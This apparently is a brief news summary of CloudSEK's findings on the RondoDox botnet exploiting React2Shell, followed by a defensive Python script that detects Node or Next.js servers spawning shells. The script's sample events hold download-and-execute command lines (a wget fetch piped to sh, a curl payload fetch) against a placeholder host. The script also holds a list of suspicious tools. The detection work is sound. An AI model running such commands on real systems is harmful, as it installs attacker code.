Introduction
Cybersecurity researchers have uncovered an extensive nine-month campaign targeting IoT devices and web applications, orchestrated by a botnet named RondoDox. This botnet exploits the critical React2Shell vulnerability (CVE-2025-55182) to gain unauthorized access and achieve remote code execution.
Key Details
- Who: Cybersecurity experts from CloudSEK.
- What: RondoDox botnet exploits vulnerabilities in devices, primarily using React2Shell for infiltration.
- When: Activity tracked from early 2025 to December 2025.
- Where: Affected devices primarily located in the U.S., Germany, France, and India, with over 90,000 instances still vulnerable as of late December 2025.
- Why: The RondoDox campaign highlights the urgency for organizations to reinforce their cybersecurity measures to prevent exploitation of high-risk vulnerabilities.
- How: It infiltrates networks and deploys malware that targets both IoT devices and web servers, systematically escalating control and removing competing malware.
Why It Matters
This development poses significant risks to organizational cybersecurity and infrastructure management, impacting:
- Enterprise Security: Unpatched vulnerabilities can lead to unauthorized access and data breaches.
- Hybrid/Multi-Cloud Adoption: Exploits can affect services deployed across cloud architectures, hampering seamless integration and security.
- Server/Network Automation: Attacks may disrupt automated tasks, necessitating continuous monitoring and immediate patches.
Takeaway for IT Teams
Organizations must prioritize immediate updates to Next.js frameworks and implement Web Application Firewalls (WAFs). It’s crucial to isolate IoT devices within dedicated VLANs and actively monitor for unusual process executions to safeguard against similar threats.
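As an added example (not code from the original article), the check below illustrates one concrete form of the "unusual process executions" the takeaway recommends watching for: a Next.js/Node server process spawning a shell or download utility. The process-creation events and their field names are constructed for illustration.

```python
import os

# Constructed sample process-creation events (hypothetical telemetry; field names are assumed).
SAMPLE_EVENTS = [
    {"host": "web-01", "parent": "/usr/bin/node", "pid": 1301, "image": "/bin/sh",
     "cmdline": "sh -c 'wget http://EXAMPLE-PLACEHOLDER/x.sh -O- | sh'"},
    {"host": "web-01", "parent": "/usr/bin/node", "pid": 1302, "image": "/usr/bin/node",
     "cmdline": "node /app/.next/worker.js"},          # benign: node spawning a node worker
    {"host": "web-02", "parent": "/usr/bin/next-server", "pid": 2210, "image": "/usr/bin/curl",
     "cmdline": "curl -fsSL http://EXAMPLE-PLACEHOLDER/bot"},
    {"host": "web-02", "parent": "/usr/bin/bash", "pid": 2211, "image": "/bin/sh",
     "cmdline": "sh /opt/backup.sh"},                   # benign: not a web-server parent
]

# Parent images that serve a Next.js application and normally never need a shell.
WEB_PARENTS = {"node", "next-server"}
# Children that indicate command execution or payload retrieval from a web process.
SUSPICIOUS_CHILDREN = {"sh", "bash", "dash", "curl", "wget", "busybox", "nc"}


def classify(event):
    """Return a reason string if the event looks like post-exploitation activity, else None."""
    parent = os.path.basename(event["parent"])
    child = os.path.basename(event["image"])
    if parent not in WEB_PARENTS or child not in SUSPICIOUS_CHILDREN:
        return None
    reason = f"{parent} spawned {child}"
    # Piping a downloaded script straight into a shell raises confidence further.
    if "| sh" in event["cmdline"] or "| bash" in event["cmdline"]:
        reason += " (download piped to shell)"
    return reason


def find_suspicious(events):
    """Return (host, pid, reason) tuples for every event that classify() flags."""
    alerts = []
    for e in events:
        reason = classify(e)
        if reason:
            alerts.append((e["host"], e["pid"], reason))
    return alerts


if __name__ == "__main__":
    for host, pid, reason in find_suspicious(SAMPLE_EVENTS):
        print(f"{host} pid={pid}: {reason}")
```

In a real deployment the same rule would run over auditd, eBPF or EDR process-creation telemetry rather than an inline list.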
Call-to-Action
For more curated news and infrastructure insights, visit TrendInfra.com.